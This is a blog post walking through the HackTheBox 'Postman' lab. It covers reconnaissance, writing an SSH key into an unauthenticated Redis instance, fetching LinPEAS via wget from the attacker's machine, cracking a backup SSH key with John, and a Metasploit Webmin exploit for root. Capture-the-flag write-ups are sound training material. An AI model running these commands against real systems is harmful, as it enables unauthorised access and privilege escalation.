Ajdin's blog Tags Github RSS

HackTheBox Postman Write Up

13 Mar 2020

Reconnaissance

Let’s run a quick nmap scan as always.

# nmap -sV -sC -O -oA nmap/initial 10.10.10.160

Short explanation:

-sV Version detection
-sC Script scan
-O  Enable OS detection 
-oA Output to all formats

For a more detailed explanation click here.

While I wait for this to be finished I’ll start a full nmap scan.

# nmap -sV -sC -O -p- -oA nmap/initial 10.10.10.160

nmap initial

As usual we have port 22 and port 80 running, but here we also have http protocol running on port 10000, let’s enumerate on those pages.

port80

port80

Now on the second server I have to add a “s” to my http request so I can access that.

port80

I’ll also start up gobuster. On port 10000 every page link loads the same login so gobuster doesn’t help us there. Let’s run it on port 80.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.160 -x php,html -t 100

gobuster

Now I felt kinda lost so I looked into what did the full nmap scan find.

nmap full

Getting user account

Redis file write

So we have something called Redis here running. I tried to find some explanation to what is it and how to exploit it, Google found this.

The Redis security model is: “it’s totally insecure to let untrusted clients access the system, please protect it from the outside world yourself”.

So we’re on the right track. The developer guides us for the next steps on how to exploit this. Using telnet we can see now that we can connect to the machine easily:

$ telnet 10.10.10.160 6379

We don’t have a real shell here but we can write some files. We’ll write our own ssh keys. Let’s generate them.

nmap full

We will push the key and pad it before and after. Why? Well we’ll push it to Redis memory and then flush the memory to a file. The memory will contain a lot of garbage and we’re hoping ssh will parse the file, ignore the garbage and correctly read our key.

$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

Now foo.txt is just our public key but with newlines. We can write this string inside the memory of Redis using redis-cli:

$ redis-cli -h 10.10.10.160 flushall
$ cat foo.txt | redis-cli -h 10.10.10.160 -x set crackit

Looks good. How to dump our memory content into the authorized_keys file? You can see what have I done in picture below.

redis

Now that we’ve got a shell, we can see by running

$ cat /etc/passwd

that we have to gain access to Matt’s account.

We can’t run anything as sudo and we don’t belong in any special groups. I searched the redis dir but there wasn’t anything we could work with, I went into /var and checked every folder and again, nothing we can work with. Let’s pull the big guns out. Big guns being LinPEAS. Let’s transfer them onto the server.

Clone the repo to your machine, enter the /linPEAS dir and start an http server from there. I used port 1114.

$ sudo python -m SimpleHTTPServer 1114

Now, navigate to /tmp and create a dir there and cd into it (e.g. /tmp/1234), then grab the file from the machine.

$ wget <your ip here>:1114/linpeas.sh

Now I ran the script and spent some time looking at the output. This took some time but there is a id_rsa.bak file.

id rsa bak

Cracking ssh key with John

Simply pipe this into ssh2john.py and crack it with the rockyou.txt wordlist.

john

I tried to ssh into the server with this key but no success. So I connected again as redis and ran

$ su Matt

And that’s how I got user

Matt@Postman:~$ cat user.txt 
517ad...

Getting root

Getting root is pretty easy, I just logged into webmin with Matt and computer2008. In there I couldn’t do anything, but we can see a notification that we have to update the software.

Webmin privilege escalation

I found an exploit on Metasploit and used it. Below are highlighted the options which are changed. Make sure to switch the payload as the default one didn’t work. I always have success in using the python one.

 > show payloads
 > set payload <payload here>

metasploit

After this you can simply type exploit and you should have a shell as root and you can cat root.txt.

redis john webmin